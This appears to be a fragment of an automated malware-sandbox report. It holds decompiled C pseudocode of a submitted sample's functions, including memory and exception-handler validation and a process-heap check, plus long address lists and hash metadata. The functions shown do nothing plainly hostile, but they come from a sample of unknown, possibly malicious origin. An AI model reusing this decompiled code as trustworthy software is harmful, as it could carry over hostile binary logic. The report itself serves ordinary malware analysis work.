                                                                                  					E00402880(_a4, _a8, _a20, _a16, _a20);
                                                                                  					return 1;
                                                                                  				}
                                                                                  				E00402390(_t341, _a4, 1, _a20);
                                                                                  				return 1;
                                                                                  			}

















































                                                                                  0x00402e9d
                                                                                  0x00402ea1
                                                                                  0x00402ea6
                                                                                  0x00402ea9
                                                                                  0x00402eb6
                                                                                  0x00402ed4
                                                                                  0x00402edb
                                                                                  0x00402f03
                                                                                  0x00402f15
                                                                                  0x00402f15
                                                                                  0x00402f19
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402f1b
                                                                                  0x00402f1f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402f21
                                                                                  0x00402f2b
                                                                                  0x00402f31
                                                                                  0x00402f0f
                                                                                  0x00402f0f
                                                                                  0x00402f12
                                                                                  0x00000000
                                                                                  0x00402f12
                                                                                  0x00000000
                                                                                  0x00402f33
                                                                                  0x00402f37
                                                                                  0x00402f3b
                                                                                  0x00402f63
                                                                                  0x00402f72
                                                                                  0x00402f81
                                                                                  0x00402f90
                                                                                  0x00402f9f
                                                                                  0x00402fa5
                                                                                  0x00402fc5
                                                                                  0x00402fca
                                                                                  0x00402fda
                                                                                  0x00402fdd
                                                                                  0x00402fef
                                                                                  0x00402fef
                                                                                  0x00402ff2
                                                                                  0x00402ff5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040300a
                                                                                  0x0040302b
                                                                                  0x00403030
                                                                                  0x00403033
                                                                                  0x0040304a
                                                                                  0x00403073
                                                                                  0x00403078
                                                                                  0x0040307b
                                                                                  0x0040307b
                                                                                  0x00402fe9
                                                                                  0x00402fe9
                                                                                  0x00402fec
                                                                                  0x00402fec
                                                                                  0x00403084
                                                                                  0x00403093
                                                                                  0x00403098
                                                                                  0x0040309b
                                                                                  0x004030a1
                                                                                  0x004030b2
                                                                                  0x004030b2
                                                                                  0x004030b6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004030b8
                                                                                  0x004030be
                                                                                  0x004030c5
                                                                                  0x004030c8
                                                                                  0x004030ad
                                                                                  0x004030ad
                                                                                  0x004030af
                                                                                  0x00000000
                                                                                  0x004030af
                                                                                  0x00000000
                                                                                  0x004030ca
                                                                                  0x004030ce
                                                                                  0x004030d5
                                                                                  0x004030dc
                                                                                  0x004030e3
                                                                                  0x004030e3
                                                                                  0x004030ea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004030f0
                                                                                  0x004030f4
                                                                                  0x00403130
                                                                                  0x00403130
                                                                                  0x00403134
                                                                                  0x00403229
                                                                                  0x0040322d
                                                                                  0x00403232
                                                                                  0x00403232
                                                                                  0x00403235
                                                                                  0x00403235
                                                                                  0x00403238
                                                                                  0x00403238
                                                                                  0x0040323c
                                                                                  0x004032c5
                                                                                  0x004032c5
                                                                                  0x004032c5
                                                                                  0x004032c9
                                                                                  0x004032e6
                                                                                  0x004032e6
                                                                                  0x004032e8
                                                                                  0x004032cb
                                                                                  0x004032cb
                                                                                  0x004032db
                                                                                  0x004032db
                                                                                  0x004032eb
                                                                                  0x004032eb
                                                                                  0x00000000
                                                                                  0x004032ef
                                                                                  0x00403242
                                                                                  0x00403246
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403248
                                                                                  0x0040324c
                                                                                  0x00403272
                                                                                  0x00403289
                                                                                  0x004032ab
                                                                                  0x004032b0
                                                                                  0x004032b3
                                                                                  0x004032b3
                                                                                  0x004032b7
                                                                                  0x004032b7
                                                                                  0x004032be
                                                                                  0x00000000
                                                                                  0x004032be
                                                                                  0x00403261
                                                                                  0x00403266
                                                                                  0x00403269
                                                                                  0x00000000
                                                                                  0x00403269
                                                                                  0x0040313a
                                                                                  0x00403140
                                                                                  0x00403147
                                                                                  0x0040314a
                                                                                  0x00403227
                                                                                  0x00000000
                                                                                  0x00403227
                                                                                  0x00403150
                                                                                  0x0040315a
                                                                                  0x00403163
                                                                                  0x00403166
                                                                                  0x00403170
                                                                                  0x00403182
                                                                                  0x00403188
                                                                                  0x0040318b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040318d
                                                                                  0x0040318d
                                                                                  0x0040318d
                                                                                  0x00403191
                                                                                  0x004031a8
                                                                                  0x004031a8
                                                                                  0x004031aa
                                                                                  0x00403193
                                                                                  0x00403193
                                                                                  0x004031a0
                                                                                  0x004031a0
                                                                                  0x004031ad
                                                                                  0x004031ad
                                                                                  0x004031b9
                                                                                  0x004031bf
                                                                                  0x004031c3
                                                                                  0x004031c5
                                                                                  0x004031c8
                                                                                  0x004031cf
                                                                                  0x004031d2
                                                                                  0x004031da
                                                                                  0x004031da
                                                                                  0x004031dd
                                                                                  0x004031dd
                                                                                  0x004031d2
                                                                                  0x0040317c
                                                                                  0x0040317c
                                                                                  0x0040317f
                                                                                  0x0040317f
                                                                                  0x004031eb
                                                                                  0x00403207
                                                                                  0x00403207
                                                                                  0x0040320b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403213
                                                                                  0x00403216
                                                                                  0x004031f6
                                                                                  0x004031ff
                                                                                  0x004031ff
                                                                                  0x00403201
                                                                                  0x00000000
                                                                                  0x00403201
                                                                                  0x00000000
                                                                                  0x00403218
                                                                                  0x00403222
                                                                                  0x00403222
                                                                                  0x00403224
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004030f6
                                                                                  0x004030f6
                                                                                  0x00403102
                                                                                  0x00403124
                                                                                  0x00403129
                                                                                  0x0040312c
                                                                                  0x0040312c
                                                                                  0x00000000
                                                                                  0x004030f6
                                                                                  0x004032f4
                                                                                  0x004032f8
                                                                                  0x00403369
                                                                                  0x00403375
                                                                                  0x0040337a
                                                                                  0x0040337d
                                                                                  0x0040337d
                                                                                  0x00403381
                                                                                  0x0040338b
                                                                                  0x00403390
                                                                                  0x00403390
                                                                                  0x00403397
                                                                                  0x0040339c
                                                                                  0x0040339f
                                                                                  0x0040339f
                                                                                  0x004033a3
                                                                                  0x004033a3
                                                                                  0x004033a7
                                                                                  0x004033b1
                                                                                  0x004033b6
                                                                                  0x004033b6
                                                                                  0x004033bd
                                                                                  0x004033c2
                                                                                  0x004033c5
                                                                                  0x004033c5
                                                                                  0x004033c9
                                                                                  0x004033c9
                                                                                  0x004033cd
                                                                                  0x004033d7
                                                                                  0x004033dc
                                                                                  0x004033dc
                                                                                  0x004033e3
                                                                                  0x004033e8
                                                                                  0x004033eb
                                                                                  0x004033eb
                                                                                  0x004033ef
                                                                                  0x004033ef
                                                                                  0x004033f3
                                                                                  0x004033fd
                                                                                  0x00403402
                                                                                  0x00403402
                                                                                  0x00403409
                                                                                  0x0040340e
                                                                                  0x00403411
                                                                                  0x00403411
                                                                                  0x00403415
                                                                                  0x00403427
                                                                                  0x0040342a
                                                                                  0x0040342d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040342f
                                                                                  0x0040342f
                                                                                  0x0040342f
                                                                                  0x00403432
                                                                                  0x0040343a
                                                                                  0x0040344b
                                                                                  0x00403450
                                                                                  0x00403450
                                                                                  0x0040345e
                                                                                  0x00403463
                                                                                  0x00403466
                                                                                  0x00403466
                                                                                  0x00403421
                                                                                  0x00403421
                                                                                  0x00403424
                                                                                  0x00403424
                                                                                  0x0040346c
                                                                                  0x00000000
                                                                                  0x0040346c
                                                                                  0x004032fa
                                                                                  0x004032fe
                                                                                  0x00403324
                                                                                  0x0040333b
                                                                                  0x0040335d
                                                                                  0x00403362
                                                                                  0x00403365
                                                                                  0x00403365
                                                                                  0x00000000
                                                                                  0x00403324
                                                                                  0x00403313
                                                                                  0x00403318
                                                                                  0x0040331b
                                                                                  0x00000000
                                                                                  0x0040331b
                                                                                  0x00000000
                                                                                  0x00402f56
                                                                                  0x00402ef1
                                                                                  0x00000000
                                                                                  0x00402ef9
                                                                                  0x00402ec2
                                                                                  0x00000000

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: 126ff2460c73df62577a113f922c69a32de2f099fd1620a44d5835c220e5ee3b
                                                                                  • Instruction ID: 666c09e752f25340368080dc05edb327bf1878cdf7e1111d2f812ccb911ea8c0
                                                                                  • Opcode Fuzzy Hash: 126ff2460c73df62577a113f922c69a32de2f099fd1620a44d5835c220e5ee3b
                                                                                  • Instruction Fuzzy Hash: 59124EB1D001099BCF14DF98D985AEFB7B9BB88305F14816DF909B7380D739AA41CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040F2CD(long _a4) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v16;
                                                                                  				short* _v32;
                                                                                  				void _v36;
                                                                                  				void* _t57;
                                                                                  				signed int _t58;
                                                                                  				signed int _t61;
                                                                                  				signed int _t62;
                                                                                  				void* _t63;
                                                                                  				signed int* _t68;
                                                                                  				intOrPtr* _t69;
                                                                                  				intOrPtr* _t71;
                                                                                  				intOrPtr _t72;
                                                                                  				intOrPtr _t75;
                                                                                  				void* _t76;
                                                                                  				signed int _t77;
                                                                                  				void* _t78;
                                                                                  				void _t80;
                                                                                  				signed int _t81;
                                                                                  				signed int _t84;
                                                                                  				signed int _t86;
                                                                                  				short* _t87;
                                                                                  				void* _t89;
                                                                                  				signed int* _t90;
                                                                                  				long _t91;
                                                                                  				signed int _t93;
                                                                                  				signed int _t94;
                                                                                  				signed int _t100;
                                                                                  				signed int _t102;
                                                                                  				void* _t104;
                                                                                  				long _t108;
                                                                                  				signed int _t110;
                                                                                  
                                                                                  				_t108 = _a4;
                                                                                  				_t76 =  *(_t108 + 8);
                                                                                  				if((_t76 & 0x00000003) != 0) {
                                                                                  					L3:
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_a4 =  *[fs:0x4];
                                                                                  				_v8 =  *[fs:0x8];
                                                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                  					_t102 =  *(_t108 + 0xc);
                                                                                  					__eflags = _t102 - 0xffffffff;
                                                                                  					if(_t102 != 0xffffffff) {
                                                                                  						_t91 = 0;
                                                                                  						__eflags = 0;
                                                                                  						_a4 = 0;
                                                                                  						_t57 = _t76;
                                                                                  						do {
                                                                                  							_t80 =  *_t57;
                                                                                  							__eflags = _t80 - 0xffffffff;
                                                                                  							if(_t80 == 0xffffffff) {
                                                                                  								goto L9;
                                                                                  							}
                                                                                  							__eflags = _t80 - _t91;
                                                                                  							if(_t80 >= _t91) {
                                                                                  								L20:
                                                                                  								_t63 = 0;
                                                                                  								L60:
                                                                                  								return _t63;
                                                                                  							}
                                                                                  							L9:
                                                                                  							__eflags =  *(_t57 + 4);
                                                                                  							if( *(_t57 + 4) != 0) {
                                                                                  								_t12 =  &_a4;
                                                                                  								 *_t12 = _a4 + 1;
                                                                                  								__eflags =  *_t12;
                                                                                  							}
                                                                                  							_t91 = _t91 + 1;
                                                                                  							_t57 = _t57 + 0xc;
                                                                                  							__eflags = _t91 - _t102;
                                                                                  						} while (_t91 <= _t102);
                                                                                  						__eflags = _a4;
                                                                                  						if(_a4 == 0) {
                                                                                  							L15:
                                                                                  							_t81 =  *0x415690;
                                                                                  							_t110 = _t76 & 0xfffff000;
                                                                                  							_t58 = 0;
                                                                                  							__eflags = _t81;
                                                                                  							if(_t81 <= 0) {
                                                                                  								L18:
                                                                                  								_t104 = _t102 | 0xffffffff;
                                                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                  								__eflags = _t61;
                                                                                  								if(_t61 < 0) {
                                                                                  									_t62 = 0;
                                                                                  									__eflags = 0;
                                                                                  								} else {
                                                                                  									_t62 = _a4;
                                                                                  								}
                                                                                  								__eflags = _t62;
                                                                                  								if(_t62 == 0) {
                                                                                  									L59:
                                                                                  									_t63 = _t104;
                                                                                  									goto L60;
                                                                                  								} else {
                                                                                  									__eflags = _v12 - 0x1000000;
                                                                                  									if(_v12 != 0x1000000) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									__eflags = _v16 & 0x000000cc;
                                                                                  									if((_v16 & 0x000000cc) == 0) {
                                                                                  										L46:
                                                                                  										_t63 = 1;
                                                                                  										 *0x4156d8 = 1;
                                                                                  										__eflags =  *0x4156d8;
                                                                                  										if( *0x4156d8 != 0) {
                                                                                  											goto L60;
                                                                                  										}
                                                                                  										_t84 =  *0x415690;
                                                                                  										__eflags = _t84;
                                                                                  										_t93 = _t84;
                                                                                  										if(_t84 <= 0) {
                                                                                  											L51:
                                                                                  											__eflags = _t93;
                                                                                  											if(_t93 != 0) {
                                                                                  												L58:
                                                                                  												 *0x4156d8 = 0;
                                                                                  												goto L5;
                                                                                  											}
                                                                                  											_t77 = 0xf;
                                                                                  											__eflags = _t84 - _t77;
                                                                                  											if(_t84 <= _t77) {
                                                                                  												_t77 = _t84;
                                                                                  											}
                                                                                  											_t94 = 0;
                                                                                  											__eflags = _t77;
                                                                                  											if(_t77 < 0) {
                                                                                  												L56:
                                                                                  												__eflags = _t84 - 0x10;
                                                                                  												if(_t84 < 0x10) {
                                                                                  													_t86 = _t84 + 1;
                                                                                  													__eflags = _t86;
                                                                                  													 *0x415690 = _t86;
                                                                                  												}
                                                                                  												goto L58;
                                                                                  											} else {
                                                                                  												do {
                                                                                  													_t68 = 0x415698 + _t94 * 4;
                                                                                  													_t94 = _t94 + 1;
                                                                                  													__eflags = _t94 - _t77;
                                                                                  													 *_t68 = _t110;
                                                                                  													_t110 =  *_t68;
                                                                                  												} while (_t94 <= _t77);
                                                                                  												goto L56;
                                                                                  											}
                                                                                  										}
                                                                                  										_t69 = 0x415694 + _t84 * 4;
                                                                                  										while(1) {
                                                                                  											__eflags =  *_t69 - _t110;
                                                                                  											if( *_t69 == _t110) {
                                                                                  												goto L51;
                                                                                  											}
                                                                                  											_t93 = _t93 - 1;
                                                                                  											_t69 = _t69 - 4;
                                                                                  											__eflags = _t93;
                                                                                  											if(_t93 > 0) {
                                                                                  												continue;
                                                                                  											}
                                                                                  											goto L51;
                                                                                  										}
                                                                                  										goto L51;
                                                                                  									}
                                                                                  									_t87 = _v32;
                                                                                  									__eflags =  *_t87 - 0x5a4d;
                                                                                  									if( *_t87 != 0x5a4d) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                  									__eflags =  *_t71 - 0x4550;
                                                                                  									if( *_t71 != 0x4550) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									_t78 = _t76 - _t87;
                                                                                  									__eflags =  *((short*)(_t71 + 6));
                                                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                  										goto L59;
                                                                                  									}
                                                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                  									__eflags = _t78 - _t72;
                                                                                  									if(_t78 < _t72) {
                                                                                  										goto L46;
                                                                                  									}
                                                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                  										goto L46;
                                                                                  									}
                                                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                  										goto L20;
                                                                                  									}
                                                                                  									goto L46;
                                                                                  								}
                                                                                  							} else {
                                                                                  								goto L16;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L16:
                                                                                  								__eflags =  *((intOrPtr*)(0x415698 + _t58 * 4)) - _t110;
                                                                                  								if( *((intOrPtr*)(0x415698 + _t58 * 4)) == _t110) {
                                                                                  									break;
                                                                                  								}
                                                                                  								_t58 = _t58 + 1;
                                                                                  								__eflags = _t58 - _t81;
                                                                                  								if(_t58 < _t81) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								goto L18;
                                                                                  							}
                                                                                  							__eflags = _t58;
                                                                                  							if(_t58 <= 0) {
                                                                                  								goto L5;
                                                                                  							}
                                                                                  							 *0x4156d8 = 1;
                                                                                  							__eflags =  *0x4156d8;
                                                                                  							if( *0x4156d8 != 0) {
                                                                                  								goto L5;
                                                                                  							}
                                                                                  							__eflags =  *((intOrPtr*)(0x415698 + _t58 * 4)) - _t110;
                                                                                  							if( *((intOrPtr*)(0x415698 + _t58 * 4)) == _t110) {
                                                                                  								L32:
                                                                                  								_t100 = 0;
                                                                                  								__eflags = _t58;
                                                                                  								if(_t58 < 0) {
                                                                                  									L34:
                                                                                  									 *0x4156d8 = 0;
                                                                                  									goto L5;
                                                                                  								} else {
                                                                                  									goto L33;
                                                                                  								}
                                                                                  								do {
                                                                                  									L33:
                                                                                  									_t90 = 0x415698 + _t100 * 4;
                                                                                  									_t100 = _t100 + 1;
                                                                                  									__eflags = _t100 - _t58;
                                                                                  									 *_t90 = _t110;
                                                                                  									_t110 =  *_t90;
                                                                                  								} while (_t100 <= _t58);
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							_t58 = _t81 - 1;
                                                                                  							__eflags = _t58;
                                                                                  							if(_t58 < 0) {
                                                                                  								L28:
                                                                                  								__eflags = _t81 - 0x10;
                                                                                  								if(_t81 < 0x10) {
                                                                                  									_t81 = _t81 + 1;
                                                                                  									__eflags = _t81;
                                                                                  									 *0x415690 = _t81;
                                                                                  								}
                                                                                  								_t58 = _t81 - 1;
                                                                                  								goto L32;
                                                                                  							} else {
                                                                                  								goto L25;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L25:
                                                                                  								__eflags =  *((intOrPtr*)(0x415698 + _t58 * 4)) - _t110;
                                                                                  								if( *((intOrPtr*)(0x415698 + _t58 * 4)) == _t110) {
                                                                                  									break;
                                                                                  								}
                                                                                  								_t58 = _t58 - 1;
                                                                                  								__eflags = _t58;
                                                                                  								if(_t58 >= 0) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								break;
                                                                                  							}
                                                                                  							__eflags = _t58;
                                                                                  							if(__eflags >= 0) {
                                                                                  								if(__eflags == 0) {
                                                                                  									goto L34;
                                                                                  								}
                                                                                  								goto L32;
                                                                                  							}
                                                                                  							goto L28;
                                                                                  						}
                                                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                  						__eflags = _t75 - _v8;
                                                                                  						if(_t75 < _v8) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						__eflags = _t75 - _t108;
                                                                                  						if(_t75 >= _t108) {
                                                                                  							goto L20;
                                                                                  						}
                                                                                  						goto L15;
                                                                                  					}
                                                                                  					L5:
                                                                                  					_t63 = 1;
                                                                                  					goto L60;
                                                                                  				} else {
                                                                                  					goto L3;
                                                                                  				}
                                                                                  			}




































                                                                                  0x0040f2d7
                                                                                  0x0040f2da
                                                                                  0x0040f2e0
                                                                                  0x0040f2fe
                                                                                  0x00000000
                                                                                  0x0040f2fe
                                                                                  0x0040f2e8
                                                                                  0x0040f2f1
                                                                                  0x0040f2f7
                                                                                  0x0040f306
                                                                                  0x0040f309
                                                                                  0x0040f30c
                                                                                  0x0040f316
                                                                                  0x0040f316
                                                                                  0x0040f318
                                                                                  0x0040f31b
                                                                                  0x0040f31d
                                                                                  0x0040f31d
                                                                                  0x0040f31f
                                                                                  0x0040f322
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f324
                                                                                  0x0040f326
                                                                                  0x0040f38c
                                                                                  0x0040f38c
                                                                                  0x0040f4ea
                                                                                  0x00000000
                                                                                  0x0040f4ea
                                                                                  0x0040f328
                                                                                  0x0040f328
                                                                                  0x0040f32c
                                                                                  0x0040f32e
                                                                                  0x0040f32e
                                                                                  0x0040f32e
                                                                                  0x0040f32e
                                                                                  0x0040f331
                                                                                  0x0040f332
                                                                                  0x0040f335
                                                                                  0x0040f335
                                                                                  0x0040f339
                                                                                  0x0040f33d
                                                                                  0x0040f34b
                                                                                  0x0040f34b
                                                                                  0x0040f353
                                                                                  0x0040f359
                                                                                  0x0040f35b
                                                                                  0x0040f35d
                                                                                  0x0040f36d
                                                                                  0x0040f37a
                                                                                  0x0040f37e
                                                                                  0x0040f383
                                                                                  0x0040f385
                                                                                  0x0040f403
                                                                                  0x0040f403
                                                                                  0x0040f387
                                                                                  0x0040f387
                                                                                  0x0040f387
                                                                                  0x0040f405
                                                                                  0x0040f407
                                                                                  0x0040f4e8
                                                                                  0x0040f4e8
                                                                                  0x00000000
                                                                                  0x0040f40d
                                                                                  0x0040f40d
                                                                                  0x0040f414
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f41a
                                                                                  0x0040f41e
                                                                                  0x0040f47a
                                                                                  0x0040f47c
                                                                                  0x0040f484
                                                                                  0x0040f486
                                                                                  0x0040f488
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f48a
                                                                                  0x0040f490
                                                                                  0x0040f492
                                                                                  0x0040f494
                                                                                  0x0040f4a9
                                                                                  0x0040f4a9
                                                                                  0x0040f4ab
                                                                                  0x0040f4da
                                                                                  0x0040f4e1
                                                                                  0x00000000
                                                                                  0x0040f4e1
                                                                                  0x0040f4af
                                                                                  0x0040f4b0
                                                                                  0x0040f4b2
                                                                                  0x0040f4b4
                                                                                  0x0040f4b4
                                                                                  0x0040f4b6
                                                                                  0x0040f4b8
                                                                                  0x0040f4ba
                                                                                  0x0040f4ce
                                                                                  0x0040f4ce
                                                                                  0x0040f4d1
                                                                                  0x0040f4d3
                                                                                  0x0040f4d3
                                                                                  0x0040f4d4
                                                                                  0x0040f4d4
                                                                                  0x00000000
                                                                                  0x0040f4bc
                                                                                  0x0040f4bc
                                                                                  0x0040f4bc
                                                                                  0x0040f4c5
                                                                                  0x0040f4c6
                                                                                  0x0040f4c8
                                                                                  0x0040f4ca
                                                                                  0x0040f4ca
                                                                                  0x00000000
                                                                                  0x0040f4bc
                                                                                  0x0040f4ba
                                                                                  0x0040f496
                                                                                  0x0040f49d
                                                                                  0x0040f49d
                                                                                  0x0040f49f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f4a1
                                                                                  0x0040f4a2
                                                                                  0x0040f4a5
                                                                                  0x0040f4a7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f4a7
                                                                                  0x00000000
                                                                                  0x0040f49d
                                                                                  0x0040f420
                                                                                  0x0040f423
                                                                                  0x0040f428
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f431
                                                                                  0x0040f433
                                                                                  0x0040f439
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f43f
                                                                                  0x0040f445
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f44b
                                                                                  0x0040f44d
                                                                                  0x0040f456
                                                                                  0x0040f45a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f460
                                                                                  0x0040f463
                                                                                  0x0040f465
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f46c
                                                                                  0x0040f46e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f470
                                                                                  0x0040f474
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f474
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f35f
                                                                                  0x0040f35f
                                                                                  0x0040f35f
                                                                                  0x0040f366
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f368
                                                                                  0x0040f369
                                                                                  0x0040f36b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f36b
                                                                                  0x0040f393
                                                                                  0x0040f395
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3a5
                                                                                  0x0040f3a7
                                                                                  0x0040f3a9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3af
                                                                                  0x0040f3b6
                                                                                  0x0040f3e2
                                                                                  0x0040f3e2
                                                                                  0x0040f3e4
                                                                                  0x0040f3e6
                                                                                  0x0040f3fa
                                                                                  0x0040f3fc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3e8
                                                                                  0x0040f3e8
                                                                                  0x0040f3e8
                                                                                  0x0040f3f1
                                                                                  0x0040f3f2
                                                                                  0x0040f3f4
                                                                                  0x0040f3f6
                                                                                  0x0040f3f6
                                                                                  0x00000000
                                                                                  0x0040f3e8
                                                                                  0x0040f3b8
                                                                                  0x0040f3bb
                                                                                  0x0040f3bd
                                                                                  0x0040f3cf
                                                                                  0x0040f3cf
                                                                                  0x0040f3d2
                                                                                  0x0040f3d4
                                                                                  0x0040f3d4
                                                                                  0x0040f3d5
                                                                                  0x0040f3d5
                                                                                  0x0040f3db
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3bf
                                                                                  0x0040f3bf
                                                                                  0x0040f3bf
                                                                                  0x0040f3c6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3c8
                                                                                  0x0040f3c8
                                                                                  0x0040f3c9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3c9
                                                                                  0x0040f3cb
                                                                                  0x0040f3cd
                                                                                  0x0040f3e0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f3e0
                                                                                  0x00000000
                                                                                  0x0040f3cd
                                                                                  0x0040f33f
                                                                                  0x0040f342
                                                                                  0x0040f345
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f347
                                                                                  0x0040f349
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040f349
                                                                                  0x0040f30e
                                                                                  0x0040f310
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0040F37E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MemoryQueryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2850889275-0
                                                                                  • Opcode ID: f98938338879da374d1ed71c8d6508647a2f763b1a492ab4de55adfa3652748e
                                                                                  • Instruction ID: 29f1b178ecfcfa274465d653f16a97c573d8a4959422ee4c7472f4b41953faf8
                                                                                  • Opcode Fuzzy Hash: f98938338879da374d1ed71c8d6508647a2f763b1a492ab4de55adfa3652748e
                                                                                  • Instruction Fuzzy Hash: 4E61C530600601CFDB35CE29C99066B73A5EB95324B64843BDC49E7AD1E73CDC4A8698
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00408C70(intOrPtr _a4) {
                                                                                  				void* _v1028;
                                                                                  				long _v1032;
                                                                                  				char _v1033;
                                                                                  				signed int _v1040;
                                                                                  				void* _t26;
                                                                                  
                                                                                  				_v1033 = 0;
                                                                                  				_v1032 = GetProcessHeaps(0xff,  &_v1028);
                                                                                  				if(_v1032 != 0 && _v1032 < 0x100) {
                                                                                  					_v1040 = 0;
                                                                                  					while(_v1040 < _v1032) {
                                                                                  						if( *((intOrPtr*)(_t26 + _v1040 * 4 - 0x400)) != _a4) {
                                                                                  							_v1040 = _v1040 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v1033 = 1;
                                                                                  						}
                                                                                  						goto L8;
                                                                                  					}
                                                                                  				}
                                                                                  				L8:
                                                                                  				return _v1033;
                                                                                  			}








                                                                                  0x00408c79
                                                                                  0x00408c92
                                                                                  0x00408c9f
                                                                                  0x00408cad
                                                                                  0x00408cc8
                                                                                  0x00408ce6
